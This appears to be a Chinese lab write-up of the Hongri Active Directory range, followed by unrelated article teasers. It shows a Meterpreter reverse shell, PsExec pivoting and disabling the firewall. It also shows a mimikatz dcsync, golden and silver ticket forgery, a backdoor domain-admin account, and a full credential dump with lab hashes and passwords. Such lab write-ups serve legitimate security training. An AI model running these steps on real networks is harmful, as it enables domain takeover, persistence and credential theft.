【内网攻防实战】红日靶场(一)续篇_金票与银票

红日靶场(一)续篇_权限维持

    • 前情提要
      • 当前位置
      • 执行目标
    • PsExec.exe拿下域控2008
      • rdesktop 远程登录win7
      • msf上传文件
        • kail回连马连上win7
        • upload上传PsExec.exe
      • PsExec.exe把win7 带到 2008(域控hostname:owa)
      • 2008开远程、关防火墙
      • Win7使用远程桌面登录2008
    • 将猕猴桃上传到Win7、2008
    • 黄金票据(方法一)
      • 信息搜集【域控DC执行】
      • 伪造票据【域内其他主机】
      • 清空缓存票据【域内其他主机】
      • 导入并查看票据【域内其他主机】
      • 添加用户(域内.管理员权限)与查看【域内其他主机】
      • 测试: 新用户使用PsExex控制域控
    • 白银票据(方法二)
      • 1. 本机管理员的权限(执行前)
      • 2. DC 域控信息收集
      • 3. 伪造白银票据(执行后)
    • 参考
    • 挖个坑

前情提要

本实验是红日靶场(一)的后续,靶场环境搭建,外网渗透进内网的部分这里将不再赘述。
【内网攻防实战】红日靶场01 👉 https://blog.csdn.net/weixin_46022776/article/details/139295589

当前位置

在这里插入图片描述
在这里插入图片描述

执行目标

现在的情况是:

  1. 我们已经用攻击机Kail拿下处于边界的Win7
  2. 也拿到GOD\Administrator 的shell
  3. 使用msf提权到系统,kiwi抓取kbs,知道了密码为2024@hongri

目标:我需要拿下域控,并进行权限维持

PsExec.exe拿下域控2008

rdesktop 远程登录win7

┌──(root㉿kali)-[~]
└─# rdesktop 192.168.72.131
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.

在这里插入图片描述

msf上传文件

kail回连马连上win7

msf调用模块multi/handler开启监听,rdesktop里的win7进入到C盘下,点击之前上传的64.exe回连马。

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:5555 
[*] Sending stage (200774 bytes) to 192.168.72.131
[*] Meterpreter session 4 opened (192.168.72.200:5555 -> 192.168.72.131:18363) at 2024-06-08 16:26:03 +0800

upload上传PsExec.exe

msf开启监听连上win7后,upload 上传 PsExec.exe,我这里 的PsExec.exe是放在/root目录下的

meterpreter > lcd /root
meterpreter > upload PsExec.exe
[*] Uploading  : /root/PsExec.exe -> PsExec.exe
[*] Uploaded 815.37 KiB of 815.37 KiB (100.0%): /root/PsExec.exe -> PsExec.exe
[*] Completed  : /root/PsExec.exe -> PsExec.exe
meterpreter > 

在这里插入图片描述

PsExec.exe把win7 带到 2008(域控hostname:owa)

cmd: PsExec.exe \\god.org cmd

在这里插入图片描述

这里能看到主机名发生了变化,stu1变成了owa
在这里插入图片描述

2008开远程、关防火墙

其实现在我们就相当于拿到了2008的shell了,让server 2008开启远程并关掉防火墙,这样后面win7就能用远程桌面登录进2008

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh firewall set opmode disable

在这里插入图片描述

Win7使用远程桌面登录2008

Win内开启远程桌面,输入密码2024@hongri
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
Win7 成功登进2008,域控DC拿下,接下来是权限维持。


将猕猴桃上传到Win7、2008

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:5555 
(略。。。)

meterpreter > lcd /root/Desktop
meterpreter > upload x64.zip
[*] Uploading  : /root/Desktop/x64.zip -> x64.zip
[*] Uploaded 628.89 KiB of 628.89 KiB (100.0%): /root/Desktop/x64.zip -> x64.zip
[*] Completed  : /root/Desktop/x64.zip -> x64.zip
meterpreter > shell
Process 4496 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\>chcp 65001
chcp 65001
Active code page: 65001

C:\>copy x64.zip \\192.168.52.138\c$
copy x64.zip \\192.168.52.138\c$
        1 file(s) copied.

C:\>

kail上传upload猕猴桃x64.zip到Win7,Win 7 再复制copy一份到2008的C目录下
在这里插入图片描述
解压,进入x64目录下,2008和Win7 都启动猕猴桃

黄金票据(方法一)

在制作黄金票据时,需要以下条件:

  1. 域内管理员的权限(首先是拥有域内权限,且这个身份还必须是域的管理员)
  2. 拿到域控DC的shell(可以不在域控的机子上执行,但cmd的hostname必须是域控的主机名owa)

信息搜集【域控DC执行】

mimikatz.exe
privilege::debug
lsadump::dcsync /domain:god.org /all /csv
exit
whoami /all

可以在远程登录的界面执行
在这里插入图片描述

也可以在Win7之前被PsExex.exe带入域控的god.org:cmd上执行,效果是一样的
在这里插入图片描述
这两个执行方法的shell的hostname都是owa,这就是前面说的,一必须拿到域内管理员的权限,二必须拿到域控DC的shell,你可以远程登录域控的机子执行cmd,也可以使用PsExec.exe把shell从stu1带到owa(DC主机)。

伪造票据【域内其他主机】

【注意】上面sid的-500不要写进去

mimikatz.exe
Kerberos::golden /user:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:558ae7f88589153355cbeb046ac696df /ticket:golden.kiribi

在这里插入图片描述

清空缓存票据【域内其他主机】

kerberos::purge

在这里插入图片描述

导入并查看票据【域内其他主机】

kerberos::ptt golden.kiribi
kerberos::tgt

在这里插入图片描述

添加用户(域内.管理员权限)与查看【域内其他主机】

net user testkbs Kerberos@2024 /add /domain
net group "domain admins" testkbs /add /domain

在这里插入图片描述

计算机 – 右键 – 管理 – 角色 – AD域服务 – AD用户和计算机 – god.org – User

在这里插入图片描述

测试: 新用户使用PsExex控制域控

kail开启一个新的终端,远程连接win7,这里使用新用户GOD\testkbs登录

┌──(root㉿kali)-[~]
└─# rdesktop 192.168.72.131

在这里插入图片描述

在这里插入图片描述


白银票据(方法二)

1. 本机管理员的权限(执行前)

net user /domain
dir \\owa\C$
PsExec.exe \\god.org cmd

在这里插入图片描述

2. DC 域控信息收集

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >log.txt

打开log.txt


  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 7822526 (00000000:00775cbe)
Session           : RemoteInteractive from 2
User Name         : Administrator
Domain            : GOD
Logon Server      : OWA
Logon Time        : 2024/6/8 16:57:17
SID               : S-1-5-21-2952760202-1353902439-2381784089-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : GOD
	 * LM       : eb9afcbd6f6c4cacffae40634accf0e8
	 * NTLM     : db4371323f83b0ad7f16ea72eb1fcd73
	 * SHA1     : c57e17a5823e543faae1d3ff66d171290ae69dfe
	tspkg :	
	 * Username : Administrator
	 * Domain   : GOD
	 * Password : 2024@hongri
	wdigest :	
	 * Username : Administrator
	 * Domain   : GOD
	 * Password : 2024@hongri
	kerberos :	
	 * Username : Administrator
	 * Domain   : GOD.ORG
	 * Password : 2024@hongri
	ssp :	
	credman :	

Authentication Id : 0 ; 3730688 (00000000:0038ed00)
Session           : Interactive from 1
User Name         : liukaifeng01
Domain            : GOD
Logon Server      : OWA
Logon Time        : 2024/6/1 8:30:40
SID               : S-1-5-21-2952760202-1353902439-2381784089-1000
	msv :	
	 [00000003] Primary
	 * Username : liukaifeng01
	 * Domain   : GOD
	 * LM       : 504f1ff24983db0037bf477e3ed39fca
	 * NTLM     : 4a549006cbb3489f8ed040e2771a5a14
	 * SHA1     : 152e317193b61cfb90ff32297297d9801c6d6874
	tspkg :	
	 * Username : liukaifeng01
	 * Domain   : GOD
	 * Password : hongri@2024
	wdigest :	
	 * Username : liukaifeng01
	 * Domain   : GOD
	 * Password : hongri@2024
	kerberos :	
	 * Username : liukaifeng01
	 * Domain   : GOD.ORG
	 * Password : hongri@2024
	ssp :	
	credman :	

Authentication Id : 0 ; 3730652 (00000000:0038ecdc)
Session           : Interactive from 1
User Name         : liukaifeng01
Domain            : GOD
Logon Server      : OWA
Logon Time        : 2024/6/1 8:30:40
SID               : S-1-5-21-2952760202-1353902439-2381784089-1000
	msv :	
	 [00000003] Primary
	 * Username : liukaifeng01
	 * Domain   : GOD
	 * LM       : 504f1ff24983db0037bf477e3ed39fca
	 * NTLM     : 4a549006cbb3489f8ed040e2771a5a14
	 * SHA1     : 152e317193b61cfb90ff32297297d9801c6d6874
	tspkg :	
	 * Username : liukaifeng01
	 * Domain   : GOD
	 * Password : hongri@2024
	wdigest :	
	 * Username : liukaifeng01
	 * Domain   : GOD
	 * Password : hongri@2024
	kerberos :	
	 * Username : liukaifeng01
	 * Domain   : GOD.ORG
	 * Password : hongri@2024
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : OWA$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2024/5/31 10:38:10
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : OWA$
	 * Domain   : GOD
	 * NTLM     : 19e4410dee5e1007bd435430491222b9
	 * SHA1     : e48aed977c31b645c94d4238c44e937bae77f408
	tspkg :	
	wdigest :	
	 * Username : OWA$
	 * Domain   : GOD
	 * Password : 06 0e 11 5d d4 08 7c 00 98 1f a9 9c d9 ae fe 65 f1 ff ab e5 bf 20 bd 38 87 3f 30 a0 dc 9d ef 82 eb e3 af 67 64 ab a8 74 69 23 40 5e 2a 02 60 b4 c6 9f 92 71 f7 fe 2c e0 eb f4 6c 69 ea bd ca 13 c4 90 07 96 52 6d 58 0a 6e 6c bc ce f7 54 e4 a2 a5 97 14 14 75 c8 05 70 db d9 6d ea 53 0b c9 c0 27 cf ce 4e d9 4f 37 20 2a 42 7c 2f 63 23 42 ea a5 61 43 24 87 fa 90 9c 59 95 69 6b 94 1d c3 ac bb ca dc a9 f2 82 e4 0b 4b 05 77 e8 ca 47 2c cc ea 00 42 e5 3f 2f 0a 51 03 72 f9 50 cf 29 5f cd 7d 38 de 07 e7 7c 91 8f 42 e7 d9 3f b7 bf b0 24 0f 91 69 46 32 55 49 48 a7 9c 86 57 17 29 0d 7f c4 c8 f1 7b f6 4f 10 84 4f cc 2e 5d 05 30 d0 d8 ba 30 40 31 a4 73 f6 6b ae d9 01 c3 05 58 f7 ff 78 90 0f 95 95 85 21 d5 df ed c3 4d 5a fd 21 0b 
	kerberos :	
	 * Username : owa$
	 * Domain   : GOD.ORG
	 * Password : 06 0e 11 5d d4 08 7c 00 98 1f a9 9c d9 ae fe 65 f1 ff ab e5 bf 20 bd 38 87 3f 30 a0 dc 9d ef 82 eb e3 af 67 64 ab a8 74 69 23 40 5e 2a 02 60 b4 c6 9f 92 71 f7 fe 2c e0 eb f4 6c 69 ea bd ca 13 c4 90 07 96 52 6d 58 0a 6e 6c bc ce f7 54 e4 a2 a5 97 14 14 75 c8 05 70 db d9 6d ea 53 0b c9 c0 27 cf ce 4e d9 4f 37 20 2a 42 7c 2f 63 23 42 ea a5 61 43 24 87 fa 90 9c 59 95 69 6b 94 1d c3 ac bb ca dc a9 f2 82 e4 0b 4b 05 77 e8 ca 47 2c cc ea 00 42 e5 3f 2f 0a 51 03 72 f9 50 cf 29 5f cd 7d 38 de 07 e7 7c 91 8f 42 e7 d9 3f b7 bf b0 24 0f 91 69 46 32 55 49 48 a7 9c 86 57 17 29 0d 7f c4 c8 f1 7b f6 4f 10 84 4f cc 2e 5d 05 30 d0 d8 ba 30 40 31 a4 73 f6 6b ae d9 01 c3 05 58 f7 ff 78 90 0f 95 95 85 21 d5 df ed c3 4d 5a fd 21 0b 
	ssp :	
	credman :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/5/31 10:38:45
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/5/31 10:38:10
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 45603 (00000000:0000b223)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/5/31 10:38:09
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : OWA$
	 * Domain   : GOD
	 * NTLM     : 19e4410dee5e1007bd435430491222b9
	 * SHA1     : e48aed977c31b645c94d4238c44e937bae77f408
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : OWA$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2024/5/31 10:38:09
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : OWA$
	 * Domain   : GOD
	 * Password : 06 0e 11 5d d4 08 7c 00 98 1f a9 9c d9 ae fe 65 f1 ff ab e5 bf 20 bd 38 87 3f 30 a0 dc 9d ef 82 eb e3 af 67 64 ab a8 74 69 23 40 5e 2a 02 60 b4 c6 9f 92 71 f7 fe 2c e0 eb f4 6c 69 ea bd ca 13 c4 90 07 96 52 6d 58 0a 6e 6c bc ce f7 54 e4 a2 a5 97 14 14 75 c8 05 70 db d9 6d ea 53 0b c9 c0 27 cf ce 4e d9 4f 37 20 2a 42 7c 2f 63 23 42 ea a5 61 43 24 87 fa 90 9c 59 95 69 6b 94 1d c3 ac bb ca dc a9 f2 82 e4 0b 4b 05 77 e8 ca 47 2c cc ea 00 42 e5 3f 2f 0a 51 03 72 f9 50 cf 29 5f cd 7d 38 de 07 e7 7c 91 8f 42 e7 d9 3f b7 bf b0 24 0f 91 69 46 32 55 49 48 a7 9c 86 57 17 29 0d 7f c4 c8 f1 7b f6 4f 10 84 4f cc 2e 5d 05 30 d0 d8 ba 30 40 31 a4 73 f6 6b ae d9 01 c3 05 58 f7 ff 78 90 0f 95 95 85 21 d5 df ed c3 4d 5a fd 21 0b 
	kerberos :	
	 * Username : owa$
	 * Domain   : GOD.ORG
	 * Password : 06 0e 11 5d d4 08 7c 00 98 1f a9 9c d9 ae fe 65 f1 ff ab e5 bf 20 bd 38 87 3f 30 a0 dc 9d ef 82 eb e3 af 67 64 ab a8 74 69 23 40 5e 2a 02 60 b4 c6 9f 92 71 f7 fe 2c e0 eb f4 6c 69 ea bd ca 13 c4 90 07 96 52 6d 58 0a 6e 6c bc ce f7 54 e4 a2 a5 97 14 14 75 c8 05 70 db d9 6d ea 53 0b c9 c0 27 cf ce 4e d9 4f 37 20 2a 42 7c 2f 63 23 42 ea a5 61 43 24 87 fa 90 9c 59 95 69 6b 94 1d c3 ac bb ca dc a9 f2 82 e4 0b 4b 05 77 e8 ca 47 2c cc ea 00 42 e5 3f 2f 0a 51 03 72 f9 50 cf 29 5f cd 7d 38 de 07 e7 7c 91 8f 42 e7 d9 3f b7 bf b0 24 0f 91 69 46 32 55 49 48 a7 9c 86 57 17 29 0d 7f c4 c8 f1 7b f6 4f 10 84 4f cc 2e 5d 05 30 d0 d8 ba 30 40 31 a4 73 f6 6b ae d9 01 c3 05 58 f7 ff 78 90 0f 95 95 85 21 d5 df ed c3 4d 5a fd 21 0b 
	ssp :	
	credman :	

mimikatz(commandline) # exit
Bye!

3. 伪造白银票据(执行后)

rc4 一定要找跟域控主机名对应的hash
举个例子:域控主机名OWA

  1. 先找域控主机名=> * Username : OWA$
  2. 再找hash => * NTLM : 19e4410dee5e1007bd435430491222b9

所以,rc4:19e4410dee5e1007bd435430491222b9

target:域控主机名.域名

  1. 域控主机名 => owa
  2. 域名 => god.org

所以,target:owa.god.org

## 清空之前的票据
klist purge 
## 开启猕猴桃
mimikatz.exe
## 白银票据:伪造共享文件夹服务(cifs)权限
kerberos::golden /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /target:owa.god.org /service:cifs /rc4:19e4410dee5e1007bd435430491222b9 /user:hack01 /ptt
## 退出
exit
## 查看权限
dir \\owa\C$

在这里插入图片描述

参考

域渗透之黄金票据与白银票据
https://www.freebuf.com/articles/others-articles/329728.html

挖个坑

2008目录下有redis,可能也能尝试通过redis的一些漏洞拿到shell,最近期末,作业好多后续有空再研究研究。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/694212.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

GPT-4欺骗人类的惊人成功率达99.16%!

PNAS重磅研究揭示,LLM推理能力越强欺骗率越高!! 此前,MIT的研究发现,AI在各类游戏中为了达到目的,不择手段,学会用佯装和歪曲偏好等方式欺骗人类。 GPT-4o深夜发布!Plus免费可用&…

五个避免的管理错误:提升团队绩效与发展

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗?订阅我们的简报,深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同,从行业内部的深度分析和实用指南中受益。不要错过这个机会,成为AI领…

【Java SE】字符串常量池详解,什么情况下字符串String对象存在常量池,通过==进行判断,字符串创建及截取后是否同一个对象

复习字符串创建方式 字符串的31种构造方法 public String();创建一个空白字符串, 不含有任何内容public String(char[] array);根据字符数组的内容,来创建对应的字符串public String(byte[] array);根据字节数组的内筒,来创建对应的字符串 …

Win10下CodeBlock实现socket TCP server/client

文章目录 1 安装codeblock2 适配libws2_32.a库3 TCP socket工作原理4 代码实现服务端客户端5 运行效果1 安装codeblock 官方免费下载 值得一提的是,安装时,指定安装路径,其他默认安装即可 2 适配libws2_32.a库 默认安装,只有3个库,如果编译socket,需要专门的库libws2…

Maven项目的创建

目录 1、Maven简介配置(1)设置本地仓库(2)修改Maven的jdk版本(3)添加国内镜像源添加到idea中 2、常用命令3、IDEA2023创建Maven项目(1)Maven和Maven Archetype区别(1-1&a…

L48---1637. 两点之间不包含任何点的最宽垂直区域(排序)---Java版

1.题目描述 2.思路 (1)返回两点之间内部不包含任何点的 最宽垂直区域 的宽度。 我的理解是相邻两个点,按照等差数列那样,后一个数减去相邻的前一个数,才能保证两数之间不含其他数字。 (2)所以&…

OmniGlue: Generalizable Feature Matching with Foundation Model Guidance

【引用格式】:Jiang H, Karpur A, Cao B, et al. OmniGlue: Generalizable Feature Matching with Foundation Model Guidance[J]. arXiv preprint arXiv:2405.12979, 2024. 【网址】:https://arxiv.org/pdf/2405.12979 【开源代码】:https…

[ue5]建模场景学习笔记(5)——必修内容可交互的地形,交互沙(3)

1.需求分析: 我们现在已经能够让这片地形出现在任意地方,只要角色走在这片地形上,就能够产生痕迹,但这片区域总是需要人工指定,又无法把这片区域无限扩大(显存爆炸),因此尝试使角色无…

【数据结构】十二、八种常用的排序算法讲解及代码分享

目录 一、插入排序 1)算法思想 2)代码 二、希尔排序 1)算法思想 2)代码 三、选择排序 1)算法思想 2)代码 四、堆排序 1)什么是最大堆 2)如何创建最大堆 3)算法思想 4&a…

电脑回收站清空了怎么恢复回来?分享四个好用数据恢复方法

电脑回收站清空了还能恢复回来吗?在使用电脑过程中,很多小伙伴都不重视电脑的回收站,,有用的没用的文件都往里堆积。等空间不够的时候就去一股脑清空回收站。可有时候会发现自己还需要的文件在回收站里,可回收站已经被清空了……那…

单灯双控开关原理

什么是单灯双控?顾名思义,指的是一个灯具可以通过两个不同的开关或控制器进行控制。 例如客厅的主灯可能会设置成单灯双控,一个开关位于门口,另一个位于房间内的另一侧,这样无论你是从门口进入还是从房间内出来&#x…

Meta首席AI科学家Yann LeCun指出生成式AI的不足

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗?订阅我们的简报,深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同,从行业内部的深度分析和实用指南中受益。不要错过这个机会,成为AI领…

sqli-labs 靶场 less-11~14 第十一关、第十二关、第十三关、第十四关详解:联合注入、错误注入

SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。Less 11 SQLI DUMB SERIES-11判断注入点 尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单…

插卡式仪器模块:数字万用表模块(插卡式)

• 6 位数字表显示 • 24 位分辨率 • 250 KSPS 采样率 • 电源和数字 I/O 均采用隔离抗噪技术 • 电压、电流、电阻、电感、电容的高精度测量 • 二极管/三极管测试 通道122输入 阻抗 电压10 MΩHigh-Z, 10 MΩ电流10 Ω50 mΩ / 2 Ω / 2 KΩ输入范围电压 5 V0–60 V电流…

Java桥接模式

桥接模式 最重要的是 将 抽象 与 实现 解耦 , 通过组合 在 抽象 与 实现 之间搭建桥梁 ; 【设计模式】桥接模式 ( 简介 | 适用场景 | 优缺点 | 代码示例 )-CSDN博客 桥接模式(Bridge Pattern)-(最通俗易懂的案例)_桥接模式 例子-…

SpringAI(二)

大模型:具有大规模参数和复杂计算结构的机器学习模型.通常由深度神经网络构建而成,拥有数十亿甚至数千亿个参数.其设计目的在于提高模型的表达能力和预测性能,应对复杂的任务和数据. SpringAI是一个AI工程领域的应用程序框架 大概推出时间是2023年7月份(不确定) 目的是将S…

Java 期末复习 习题集

💖 单选题 💖 填空题 💖 判断题 💖 程序阅读题 1. 读代码写结果 class A {int m 5;void zengA(int x){m m x;}int jianA(int y){return m - y;} }class B extends A {int m 3;int jianA(int z){return super.jianA(z) m;} …

【阿里YYDS】通义千问正式开源 Qwen2

Qwen2–72B正式开源,性能全面超越开源模型Llama3-70B,也超过文心4.0、豆包pro、混元pro等众多中国闭源大模型。 在过去一段时间里,Qwen系列模型从Qwen1.5升级到Qwen2,Qwen2分5个尺寸,包括Qwen2-0.5B、Qwen2-1.5B、Qwen…

RabbitMQ-topic exchange使用方法

RabbitMQ-默认读、写方式介绍 RabbitMQ-发布/订阅模式 RabbitMQ-直连交换机(direct)使用方法 目录 1、概述 2、topic交换机使用方法 2.1 适用场景 2.2 解决方案 3、代码实现 3.1 源代码实现 3.2 运行记录 4、小结 1、概述 topic 交换机是比直连交换机功能更加强大的…

CopyOnWriteArrayList详解

目录 CopyOnWriteArrayList详解1、CopyOnWriteArrayList简介2、如何理解"写时复制"3、CopyOnWriteArrayList的继承体系4、CopyOnWriteArrayList的构造函数5、CopyOnWriteArrayList的使用示例6、CopyOnWriteArrayList 的 add方法7、CopyOnWriteArrayList弱一致性的体现…